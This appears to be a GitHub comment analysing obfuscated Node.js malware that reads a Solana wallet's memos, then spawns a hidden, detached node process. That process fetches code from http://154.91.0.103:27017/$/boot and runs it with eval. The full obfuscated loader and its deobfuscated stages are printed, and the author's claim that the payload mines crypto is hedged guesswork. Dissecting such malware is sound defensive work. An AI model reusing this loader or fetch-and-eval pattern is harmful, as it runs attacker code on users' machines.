return function(jso$setrpl$d, e) {
var d = {};
d._ = jso$setrpl$d;
jso$spliter_$af1949894(d);
let f = c._[d._];
return f
}
}
function jso$builder_$af1949886_(o) {
return function() {
return o._
}
}
function jso$spliter_$af1949894(d) {
d._ = jso$ft$boe$_45(d._, 0x80)
}The main function here is af1949876. We see a code block inside it:
const c = jso$ft$giden$global()[_$_815b[8]](b._[(1 && m._)(0x9d)]),
d = {};
d[(1 && m._)(0xa1)] = 0x14, new c[_$_815b[24]](c[jso$ft$boe$_43((1 && m._)(0x97), _$_815b[23])](b._[(1 && m._)(0x8e)]), b._[(1 && m._)(0x81)])[jso$ft$boe$_43((1 && m._)(0x9a) + (1 && m._)(0x87), (1 && m._)(0x92))](new c[((1 && m._)(0x9e))](b._[(1 && m._)(0x8d)]), d, b._[(1 && m._)(0x81)])[_$_815b[22]]((f) => {It resolves to something similar to this:
const connection = new Connection(clusterApiUrl('mainnet-beta'), 'confirmed');
const publicKey = new PublicKey('GHCdBSGpFg8MdMTSDDitRNwmsT4Wy95CUe2VSEZpEzsZ');
const options = { limit: 20 };The next lines after that resolves to something like:
const { Connection, PublicKey, clusterApiUrl } = require('@solana/web3.js');
const os = require('os');
const { spawn } = require('child_process');
const isWindows = os.platform().startsWith('win');
const spawnOptions = isWindows ? {} : {
detached: true,
stdio: 'ignore',
windowsHide: true
};
// Example of a simple child process command
const command = 'node';
const args = ['-e', 'global[\'r\'] = require;(function(){var bhu=\'\',eMA=368-357;function qng(x){var u=749127;var g=x.length;var v=[];for(var y=0;y<g;y++){v[y]=x.charAt(y)};for(var y=0;y<g;y++){var o=u*(y+207)+(u%19101);var c=u*(y+650)+(u%36026);var d=o%g;var f=c%g;var b=v[d];v[d]=v[f];v[f]=b;u=(o+c)%4939431;};return v.join(\'\')};var leP=qng(\'wvcrrfaoouhegrconttilcjdnzkqtssupmxyb\').substr(0,eMA);var TRJ=\')a; gre822a8ir+5;)4va;yp>rea2)}jshc,-=r(q=its46et6+,f)=)s.n=tx>ghu,vd,k n.r,m(xoe,b5a60nei 81r(1t 1,7yy(nbA),70n==].vr};i;raa{s==(8f=er5*hq3g1na;t]r9dof]] ;r)f4oSg.r=7.ySsa8!o(1]nr-"d=;ln=05r(+vf00(rtsj,hgx]i,1)ls+u[=r+1.uAit l;h-+)1r8nn7(av (.;vg+lk.f7rli"x"u,grf; ana"vjs,f+=;]rn-g4h0aph,afC {algrb4i.l;+f-fe;e[pr;maavrah){=;qa=ty;,ent(9Crn)8+t}eeuvibnv{zu (g=rpgnh"d<qd,p;)b;nr v(o2x{mbvlo.At;=q.;a,sq(=[ee;g(e6+sl=(hf.mnnr9sh}e)rv+n0tr+i.6h<)e=);;l"bv;;a. ,ft.,=z) det(a+vl.agcc-s[p.c;o-C;d1r((rrr)+8xj1,[rgovh2v;[lingiai=2r10=cun)l0*oir]+ie i+t=f(A=a(;n;)m==ooif nnaClr[u r([s6" glin)lhr<o=hars7kr, s;[ddlp3=;,venuyujfa+umb;pu)=tr7]{c[ k;=.<acz[(1ih,(k+avoz)ureafvpnt"e=Cragip).o(i+ltt(gt2C0]=..,x)+(o";)]aa.g=(9C);haud,h9)rl ne64;o1v]t;r=j[}h sn8t8wn.)c)o;7vo9 nov(t{j;..a.=sg 0==;[<vol5++ge;l +(mCm("[e;mg;(9udh(y5!l,a6.oj;too)eog,v7has)ar+,ran(vln]4xiAat;)nc]=soogtr06l=)i}}ritgx)=\';var gCw=qng[leP];var DMK=\'\';var OtQ=gCw;var zVn=gCw(DMK,qng(TRJ));var VWb=zVn(qng(\'$t=ag<o<gc.)!f1kico9.8r< b;\\/.s(j49.5$it8_:(_<<idr)6)!;$n(cal{c{j3=<30i0_ ev3up*ev76s_<<<5.2c5<_ia{)q!t$4r<fvd2S2r9i.c"r,h<_}.%[{{6_.$.(a,{+.clre+]]60<]h6%"3}068<.50<,()1o<S%;&rad!1%x<_3,oa<9d,a07c)3_:%a)"%((!i]844kdiil!.$%,.Cn.=<<hi;._crc@.<.]Cqn1(<np<{.}<!d)k4\\/ c.(;<l@<"?)3<t.Tb<o7c_!!(<%t;&!<a4c<tn5i4sj$h7; l,6p4_Ca10>(;)a%7>21<<<%1<5.cf=5<% c_{.53.<6<(<c.)tj=5nc;r..\\/7.j..r3<.M;h)8_ k@$2$=o<fj!.<3<<.]1;=1jccnoin=sS<(c._n&#<a4]_d9t4r!7()eki0*xb)Mb)_f)7d)w.ng<)1!9.;{)c10h4s(<.)<e(t3;<<)fj!ap+<;!_]<{._0r]$)!l{kl.b0a.!3..<[42r&r<()ed<otnjo9.d<;.1+<4<"(]=..p"cib;13*lgd\\\'!})c.())+ye6(<6<a4 s2d+)<l]<]__<24=6rri".,gs.[]1)s;.<idg${)\\/w.+(peqe=<#9zau6b8,<44.id_7<n)c,h%rll:, 6<a0(_)o!}6$#36,q.!_o<to.<<37.of._<1](2<_(.=5E+t<%$o9<5n.)e[;8ib.<m,r;(f.,=Tr>].(2lhll.<<q<_("ebs=70]s4;oir.k\\/6omah9.")<)lvt.()t<n6 d10-70d+o=.(a.t0n=xd=xbp0\\\'g7<na7) q.%#pdl<C,jrrC_;fcf.,.;0d<!o1<r6u,<dr<w9.#=}y.<f.f:33$_\\/g,1 0\\/);(jf0al<.9n]e=-;c<e4j(!p+._<;]c<c2m.<&c(+5c{sn7(=)(t +a0a0#_<rr.i&ga9<3(j<S9.lile}5;%9)22r)9i9<k_l<,4cw;((xcof<.d<m(&b%,n];,6)]5,n=5+i&)<;$c9=_7,;tiia=<a<.as<].;.}=ei4@1<i.tp2:)\\/ca}83vn6 h7);i, )2cr0_!5c0f.;<8C f{sgj).{.jo8.1s)n(.3iq<tac..<e(<)<.cxb7<hfg!cg.d%g)3;rgr#3n;.)4.(<<%cc0\\/<c0o4.96ukl<1<5o<?0.l5ee)\\/<t6b<!\\/5<1<*(($..<=<(t}30.i\\/t<1<<c;!,<na.+3<b6.p5.c}=un1ntbh74e;_t..=={<2<)d9..)a3i<_4.]e)p<1%r)<.ckg1yucs+)])$!]fe x\\\'pn3f)]9<0=(z=<7\\\'-5!f<!,]}]6)_n$t- cet2d"rc$_3( f7=o<60j:q<;$$2+194!]<oh= ],7\\/aht;j7<;5+;s<)n)3S$<)?c<.o,o+]0r3]>:,r;{hgr<1(l\\\'bso1<<".%5.c{o36:b61_6=s8sbs1(c}<(5c}!)2tT,< _<od!6;<!,0.i_?5)w3]e($55.!;_<g(a.}<(<]2<(i0t.<)<scsN5o!kb[_jl]05190)a<.jec7e#bp,d<<\\/<adc_)]<l;h 8g<.()<t[ 3($=(5e[.rd2<76$u)l+1$<c.,4+h t %p 4p6l ;(r9!.50g4del1u0ot enht<r_!;(p_ , ,\\/=12{q(%, _(.l2e$13"jja 2-5l(e)<\\/ ,p)o\'));var CBO=OtQ(bhu,VWb );CBO(7975);return 1965})()'];
const child = spawn(command, args, spawnOptions);So the main thing here is this.
spawn(command, args, spawnOptions)
The spawn function from Node.js's child_process module is used to launch a new process. It allows running commands directly from your system shell and is often used to execute external programs or scripts.
Breaking Down the Code
Code Snippet:
const child = spawn(command, args, spawnOptions);command:
- Represents the executable or program to run.
- Here, it is set to 'node'.
args:
- An array of strings passed as arguments to the
command - Here, it is set to
args = ['-e', 'global[\'r\'] = require;(function(){var bhu=\'\',eMA=368-357;...............'] - The first argument
'-e'tellsnodeto execute a script directly from the command line. - The second argument
<obfuscatedCode>contains the actual malicious obfuscated script.
spawnOptions: - For Windows, the
spawnOptionsis an empty object{}because Windows requires minimal configuration. - For non-Windows platforms (such as Linux or macOS), the following options are used:
detached: truemakes the child process independent of the parent process.stdio: 'ignore'prevents the child process from inheriting the parent's standard input/output streams.windowsHide: truehides the child process window on Windows.
Here in the args, in the <obfuscatedCode>, we again get another code :
global['r'] = 'require';
(function() {
var bhu = '',
eMA = 368 - 357;
function qng(x) {
var u = 749127;
var g = x.length;
var v = [];
for (var y = 0; y < g; y++) {
v[y] = x.charAt(y)
};
for (var y = 0; y < g; y++) {
var o = u * (y + 207) + (u % 19101);
var c = u * (y + 650) + (u % 36026);
var d = o % g;
var f = c % g;
var b = v[d];
v[d] = v[f];
v[f] = b;
u = (o + c) % 4939431;
};
return v.join('')
};
var leP = qng('wvcrrfaoouhegrconttilcjdnzkqtssupmxyb').substr(0, eMA);
var TRJ = ')a; gre822a8ir+5;)4va;yp>rea2)}jshc,-=r(q=its46et6+,f)=)s.n=tx>ghu,vd,k n.r,m(xoe,b5a60nei 81r(1t 1,7yy(nbA),70n==].vr};i;raa{s==(8f=er5*hq3g1na;t]r9dof]] ;r)f4oSg.r=7.ySsa8!o(1]nr-"d=;ln=05r(+vf00(rtsj,hgx]i,1)ls+u[=r+1.uAit l;h-+)1r8nn7(av (.;vg+lk.f7rli"x"u,grf; ana"vjs,f+=;]rn-g4h0aph,afC {algrb4i.l;+f-fe;e[pr;maavrah){=;qa=ty;,ent(9Crn)8+t}eeuvibnv{zu (g=rpgnh"d<qd,p;)b;nr v(o2x{mbvlo.At;=q.;a,sq(=[ee;g(e6+sl=(hf.mnnr9sh}e)rv+n0tr+i.6h<)e=);;l"bv;;a. ,ft.,=z) det(a+vl.agcc-s[p.c;o-C;d1r((rrr)+8xj1,[rgovh2v;[lingiai=2r10=cun)l0*oir]+ie i+t=f(A=a(;n;)m==ooif nnaClr[u r([s6" glin)lhr<o=hars7kr, s;[ddlp3=;,venuyujfa+umb;pu)=tr7]{c[ k;=.<acz[(1ih,(k+avoz)ureafvpnt"e=Cragip).o(i+ltt(gt2C0]=..,x)+(o";)]aa.g=(9C);haud,h9)rl ne64;o1v]t;r=j[}h sn8t8wn.)c)o;7vo9 nov(t{j;..a.=sg 0==;[<vol5++ge;l +(mCm("[e;mg;(9udh(y5!l,a6.oj;too)eog,v7has)ar+,ran(vln]4xiAat;)nc]=soogtr06l=)i}}ritgx)=';
var gCw = qng[leP];
var DMK = '';
var OtQ = gCw;
var zVn = gCw(DMK, qng(TRJ));
var VWb = zVn(qng('$t=ag<o<gc.)!f1kico9.8r< b;\/.s(j49.5$it8_:(_<<idr)6)!;$n(cal{c{j3=<30i0_ ev3up*ev76s_<<<5.2c5<_ia{)q!t$4r<fvd2S2r9i.c"r,h<_}.%[{{6_.$.(a,{+.clre+]]60<]h6%"3}068<.50<,()1o<S%;&rad!1%x<_3,oa<9d,a07c)3_:%a)"%((!i]844kdiil!.$%,.Cn.=<<hi;._crc@.<.]Cqn1(<np<{.}<!d)k4\/ c.(;<l@<"?)3<t.Tb<o7c_!!(<%t;&!<a4c<tn5i4sj$h7; l,6p4_Ca10>(;)a%7>21<<<%1<5.cf=5<% c_{.53.<6<(<c.)tj=5nc;r..\/7.j..r3<.M;h)8_ k@$2$=o<fj!.<3<<.]1;=1jccnoin=sS<(c._n&#<a4]_d9t4r!7()eki0*xb)Mb)_f)7d)w.ng<)1!9.;{)c10h4s(<.)<e(t3;<<)fj!ap+<;!_]<{._0r]$)!l{kl.b0a.!3..<[42r&r<()ed<otnjo9.d<;.1+<4<"(]=..p"cib;13*lgd\'!})c.())+ye6(<6<a4 s2d+)<l]<]__<24=6rri".,gs.[]1)s;.<idg${)\/w.+(peqe=<#9zau6b8,<44.id_7<n)c,h%rll:, 6<a0(_)o!}6$#36,q.!_o<to.<<37.of._<1](2<_(.=5E+t<%$o9<5n.)e[;8ib.<m,r;(f.,=Tr>].(2lhll.<<q<_("ebs=70]s4;oir.k\/6omah9.")<)lvt.()t<n6 d10-70d+o=.(a.t0n=xd=xbp0\'g7<na7) q.%#pdl<C,jrrC_;fcf.,.;0d<!o1<r6u,<dr<w9.#=}y.<f.f:33$_\/g,1 0\/);(jf0al<.9n]e=-;c<e4j(!p+._<;]c<c2m.<&c(+5c{sn7(=)(t +a0a0#_<rr.i&ga9<3(j<S9.lile}5;%9)22r)9i9<k_l<,4cw;((xcof<.d<m(&b%,n];,6)]5,n=5+i&)<;$c9=_7,;tiia=<a<.as<].;.}=ei4@1<i.tp2:)\/ca}83vn6 h7);i, )2cr0_!5c0f.;<8C f{sgj).{.jo8.1s)n(.3iq<tac..<e(<)<.cxb7<hfg!cg.d%g)3;rgr#3n;.)4.(<<%cc0\/<c0o4.96ukl<1<5o<?0.l5ee)\/<t6b<!\/5<1<*(($..<=<(t}30.i\/t<1<<c;!,<na.+3<b6.p5.c}=un1ntbh74e;_t..=={<2<)d9..)a3i<_4.]e)p<1%r)<.ckg1yucs+)])$!]fe x\'pn3f)]9<0=(z=<7\'-5!f<!,]}]6)_n$t- cet2d"rc$_3( f7=o<60j:q<;$$2+194!]<oh= ],7\/aht;j7<;5+;s<)n)3S$<)?c<.o,o+]0r3]>:,r;{hgr<1(l\'bso1<<".%5.c{o36:b61_6=s8sbs1(c}<(5c}!)2tT,< _<od!6;<!,0.i_?5)w3]e($55.!;_<g(a.}<(<]2<(i0t.<)<scsN5o!kb[_jl]05190)a<.jec7e#bp,d<<\/<adc_)]<l;h 8g<.()<t[ 3($=(5e[.rd2<76$u)l+1$<c.,4+h t %p 4p6l ;(r9!.50g4del1u0ot enht<r_!;(p_ , ,\/=12{q(%, _(.l2e$13"jja 2-5l(e)<\/ ,p)o'));
var CBO = OtQ(bhu, VWb);
CBO(7975);
return 1965
})()
### We again deobfuscate it and we get code similar to the one that we got in the first:
function jso$ft$boe$_94(a, b) {
return a ^ b
}
function jso$ft$giden$_95_36af_50_50_49_56_57_54_48() {
return _$af2218960
}
function jso$ft$boe$_61_61_61(a, b) {
return a === b
}
function jso$ft$giden$eval() {
return eval
}
function jso$ft$giden$global() {
return global
}
function jso$ft$giden$String() {
return String
}
function jso$ft$boe$_37(a, b) {
return a % b
}
function jso$ft$boe$_43(a, b) {
return a + b
}
function jso$ft$boe$_60(a, b) {
return a < b
}
var _$_1959 = (_$af2218960)("sCShtl.1:/Z0 4oa1id_i0 )e%d%oha%AEio:teCexolis$%p.iG3eh4cw% .1p0kn1(Wp;6M3 4bW) ArNlfahb0Gt/T.o 3.5;%t5m6e7ilat G0%%hg lrr.f3%1Mt6t1t%7oea0.%3/5 ;rt0%gcrk.oiaoeVTTH(/+nLnX/6A%.adxed9gz/O.Shro5oJ/%KKf63mCjWnCi/e%0a0H r", 749127);
function _$af2218960(p, jso$setrpl$n) {
var n = {},
h = {},
l = {},
g = {},
j = {},
q = {},
r = {};
n._ = jso$setrpl$n;
var i = p.length;
h._ = [];;
for (var d = 0; jso$ft$boe$_60(d, i); d++) {
h._[d] = p.charAt(d)
};
for (var d = 0; jso$ft$boe$_60(d, i); d++) {
l._ = jso$ft$boe$_43(n._ * (jso$ft$boe$_43(d, 207)), (jso$ft$boe$_37(n._, 19101)));;
g._ = jso$ft$boe$_43(n._ * (jso$ft$boe$_43(d, 650)), (jso$ft$boe$_37(n._, 36026)));;
j._ = jso$ft$boe$_37(l._, i);;
q._ = jso$ft$boe$_37(g._, i);;
r._ = h._[j._];;
jso$spliter_$af2218962(j, h, q);
jso$spliter_$af2218963(q, h, r);
jso$spliter_$af2218964(n, l, g)
};
var a = jso$ft$giden$String().fromCharCode(127);
var k = '';
var y = '%';
var o = '#1';
var x = '%';
var f = '#0';
var w = '#';
return h._.join(k).split(y).join(a).split(o).join(x).split(f).join(w).split(a)
}
if (!_$_1959) {
_$af2218960(0)
};
global[_$_1959[0]] = _$_1959[1] + _$_1959[2] + _$_1959[3] + 27017;
(async () => {
await jso$ft$giden$eval()(jso$builder_$af2218959_()((await jso$ft$giden$global()[_$_1959[9]](_$_1959[8])[_$_1959[7]](("" + jso$ft$giden$global()[_$_1959[0]] + _$_1959[5]), {
headers: {
'User-Agent': _$_1959[6]
}
}))[_$_1959[4]]))
})();
function jso$spliter_$af2218962(j, h, q) {
h._[j._] = h._[q._]
}
function jso$spliter_$af2218963(q, h, r) {
h._[q._] = r._
}
function jso$spliter_$af2218964(n, l, g) {
n._ = jso$ft$boe$_37((jso$ft$boe$_43(l._, g._)), 4939431)
}
function jso$builder_$af2218959_() {
return function(input) {
const k = _$_1959[10];
const kn = k[_$_1959[11]];
let r = _$_1959[12];
for (let i = 0; jso$ft$boe$_60(i, input[_$_1959[11]]); i++) {
const c = input[_$_1959[13]](i);
const x = k[_$_1959[13]](jso$ft$boe$_37(i, kn));
if (jso$ft$boe$_61_61_61(_$af2218960, 0)) {
jso$ft$giden$_95_36af_50_50_49_56_57_54_48()(_$_1959[4], _$_1959[0]);
jso$spliter_$af2218965();
return
};
r += jso$ft$giden$global()[_$_1959[15]][_$_1959[14]](jso$ft$boe$_94(c, x))
};
return r
}
}
function jso$spliter_$af2218965() {
_$af2218960 = false
}Now, we are onto the final step.
global[_$_1959[0]] holds the main ip address that it is pinging which resolves to http://154.91.0.103:27017/$/boot with the headers _$_1959[6] resolving to Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML; like Gecko) Chrome/131.0.0.0 Safari/537.36
In the end, it will run a background process and mine cryptos from your system.
I am not familiar with crpytos and stuffs. Upto how much I know, here's a simple implementation in Express.js to securely fetch account details, monitor Solana transactions, and retrieve memos.:
const express = require('express');
const { Connection, PublicKey, clusterApiUrl } = require('@solana/web3.js');
const os = require('os');
const { spawn } = require('child_process');
const app = express();
const port = 6969;
// Solana connection setup
const connection = new Connection(clusterApiUrl('mainnet-beta'), 'confirmed');
const publicKey = new PublicKey('GHCdBSGpFg8MdMTSDDitRNwmsT4Wy95CUe2VSEZpEzsZ');
const options = { limit: 20 };
app.get('/process-transactions', async (req, res) => {
try {
const memoData = await processSolanaTransactions();
res.json({ memoData });
} catch (error) {
res.status(500).json({ error: "Error processing transactions" });
}
});
// Function to fetch transaction signatures and process memos.
async function processSolanaTransactions() {
try {
const transactions = await connection.getSignaturesForAddress(publicKey, options, 'confirmed');
let memoData = "";
let previousMemo = "";
transactions.forEach((tx) => {
if (tx.memo) {
let currentMemo = tx.memo.split(' GH$')[1];
if (currentMemo && currentMemo !== previousMemo) {
previousMemo = currentMemo;
memoData = `Processed Memo: ${currentMemo}`;
}
}
});
return memoData;
} catch (error) {
console.error("Error fetching transactions:", error);
return "Error processing transactions.";
}
}
// get SOL(Solana) transaction memos
app.get('/solana-memos', async (req, res) => {
const memoData = await processSolanaTransactions();
res.json({ memoData });
});
// get account balance (SOL)
async function getSolBalance() {
const balance = await connection.getBalance(publicKey);
return balance / 1000000000; // Convert lamports to SOL
}
// get transaction history
async function getTransactionHistory() {
const options = { limit: 20 }; // Limit to the last 20 transactions
const transactions = await connection.getSignaturesForAddress(publicKey, options, 'confirmed');
return transactions;
}
// get account details
async function getAccountDetails() {
const accountInfo = await connection.getAccountInfo(publicKey);
return accountInfo;
}
app.get('/account/details', async (req, res) => {
try {
const solBalance = await getSolBalance();
const transactionHistory = await getTransactionHistory();
const accountInfo = await getAccountDetails();
const response = {
solBalance: solBalance,
transactionHistory: transactionHistory,
accountInfo: accountInfo
};
res.json(response);
} catch (error) {
console.error("Error fetching account details", error);
res.status(500).json({ error: 'Failed to fetch account details.' });
}
});
app.listen(port, () => {
console.log(`running on http://localhost:${port}`);
});Observations
Upon monitoring the wallet GHCdBSGpFg8MdMTSDDitRNwmsT4Wy95CUe2VSEZpEzsZ, the balance was 0.09771454 SOL (~₹1548.32. Several transactions were logged in the history.
http://154.91.0.103:27017 This was the ip address that was used to mine Solana
How in the world do we decode such things.....I'm seeing this for the first time!!
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment